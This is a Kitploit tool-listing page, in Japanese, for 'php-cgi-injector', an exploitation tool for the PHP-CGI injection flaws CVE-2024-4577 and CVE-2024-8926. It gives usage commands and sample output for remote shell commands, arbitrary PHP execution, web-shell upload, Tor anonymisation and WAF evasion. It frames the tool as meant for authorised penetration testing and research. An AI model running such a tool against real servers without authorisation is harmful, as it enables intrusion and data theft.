Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
php-cgi-Injector — CVE-2024-4577およびCVE-2024-8926をテストするためのセキュリティ侵入テストツール | Kitploit
ツール/GitHubGitHub/night-have-dreams/php-cgi-injector
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテストコマンド&コントロール
GitHubnight-have-dreams/php-cgi-injector

php-cgi-Injector

CVE-2024-4577およびCVE-2024-8926をテストするためのセキュリティ侵入テストツール

リポジトリを見る
49231年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PHP-CGI Injector

🚀 CVE-2024-4577 & CVE-2024-8926 Exploit Tool

PHP-CGI パラメータインジェクション脆弱性 に対する自動化テストツールです。CVE-2024-4577 と CVE-2024-8926 をサポートし、コマンド実行、ファイルアップロード、ダウンロード などの操作が可能です。


📌 紹介

本ツールは PHP-CGI 環境におけるパラメータインジェクション脆弱性 のテストに使用でき、以下を提供します:

  • ✅ クールなターミナルインターフェースとアニメーション効果
  • ✅ 自動化された脆弱性スキャン
  • ✅ 複数の攻撃モード(シェル、PHPコード実行、ファイルアップロード/ダウンロード)
  • ✅ デフォルトおよびカスタム Payload の組み合わせ
  • ✅ Tor トラフィック匿名化モード
  • ✅ 複数の WAF バイパスモジュール
  • ✅ 出力エンコーディングの自動変換対応
  • ✅ 強制エクスプロイトモード(脆弱性がスキャンされなくても起動可能)
  • ❌ コーヒーは淹れられませんが、WAF を焼くことはできます。
  • ❌ レポート作成、彼女獲得、大学院合格のサポートはしません。
  • ❌ ソーシャルエンジニアリングには対応していません。人間相手の対応はご自身でお願いします。

📜 免責事項

本ツールは合法的なテストおよび学術目的にのみ使用し、許可のないシステムへの使用は禁止されています!

⚠️ 不正使用は法的責任を負うことになります!

本ツールは以下の用途にのみ提供されます:

  • 🔹 企業レッドチームによるペネトレーションテスト
  • 🔹 CTF セキュリティ研究
  • 🔹 個人のセキュリティ学習
  • 🔹 その他、合法的な許可を得たセキュリティテスト

📥 依存関係のインストール

本ツールは以下の Python パッケージに依存しています。先にインストールしてください:

root@kitploit:~
pip install -r requirements.txt

または手動でインストール:

root@kitploit:~
pip install requests requests-tor chardet urllib3 rich

🛠️ 使用方法

📌 基本的な使い方

root@kitploit:~
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]

例:

root@kitploit:~
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php

📌 パラメータオプション

パラメータ説明例
-u 、 --urlターゲットURLを指定-u http://example.com
--timeout secリクエストタイムアウトを設定(0は無制限)--timeout 30
--logシェルコマンドを自動記録--log
--payloadPayload の組み合わせを指定またはカスタム--payload 2
--torTor 経由でリクエストを送信--tor
--verbose詳細情報を表示--verbose
--bypassWAF バイパスモードを有効化--bypass
--forceエクスプロイトモードを強制起動--force
--cgipoint PATHSテストする特定の CGI パスを指定--cgipoint /path
--delay secリクエスト間の遅延秒数--delay 1.5
--no-effectsすべてのアニメーションと遅延効果を無効化--no-effects

📌 操作モード

スクリプトが脆弱性を発見すると、メニューが表示されます:

root@kitploit:~
╭────────────  Exploit モードメニュー  ────────────╮
│ 現在のターゲット:http://example.com/            │
│ 現在のインジェクションポイント:/php-cgi/php-cgi.exe │
│ 脆弱性ID:CVE-2024-4577                          │
╰──────────────────────────────────────────────────╯
1) 🧪 シェルモード
2) 🛠️ PHPカスタムモード
3) 📤 ファイルアップロード
4) 📥 ファイルダウンロード
5) 🎯 攻撃ターゲットの切り替え
6) ⚙️ パラメータ設定
7) ❌ プログラム終了
>>

📌 モード詳細

1️⃣ シェルモード

システムコマンド を実行します:

root@kitploit:~
shell> whoami

📂 出力の保存

root@kitploit:~
shell> whoami --save
root@kitploit:~
shell> whoami --save C:\output\whoami.txt

2️⃣ PHP カスタムモード

カスタム PHP コード を実行します:

root@kitploit:~
phpinfo();
EOF

📂 出力の保存

root@kitploit:~
phpinfo();
EOF --save
root@kitploit:~
phpinfo();
EOF --save C:\output\info.html

3️⃣ ファイルアップロード

root@kitploit:~
ローカルファイルパス:C:\test\shell.php
ターゲットの完全パス:
[*] アップロードパスを自動設定しました: C:/xampp/htdocs/shell.php

📂 手動でパスを指定

root@kitploit:~
ターゲットの完全パス:C:\xampp\php\shell.php

4️⃣ ファイルダウンロード

root@kitploit:~
リモートファイルパス:C:\xampp\htdocs\index.php

📂 ダウンロードしたファイルは download/ に保存され、重複がある場合は自動的に番号が付与されます

root@kitploit:~
[*] ファイルのダウンロードが完了しました。download/index.php に保存されています

5️⃣ 攻撃ターゲットの切り替え

root@kitploit:~
新しいターゲットURLを入力: http://newtarget.com

🔹 脆弱性の再テストが行われます


6️⃣ パラメータ設定

root@kitploit:~
[⚙️ エクスプロイト段階のパラメータ設定メニュー]

1) ペイロードを切り替え        1
2) バイパスモジュール          未選択
3) タイムアウト                10 秒
4) リクエスト遅延              0 秒
5) 自動記録                    オフ
6) 詳細モード                  オフ
7) アニメーション効果          オン
8) 強制利用                    オフ
9) 保存して Exploit メニューに戻る

📌 Bypass WAF バイパスモジュール

以下のバイパス戦略を提供します:

  • CGI パスの変形
  • Payload の前後に無効な文字を追加
  • php://input を別の記法に置き換え
  • 特定またはランダムなHTTPヘッダーの追加
  • POST コンテンツの難読化
  • Payload の順序をランダムにシャッフル
  • カスタムバイパススクリプト。形式は tamper_example_template.txt を参照してください

ツールをダウンロード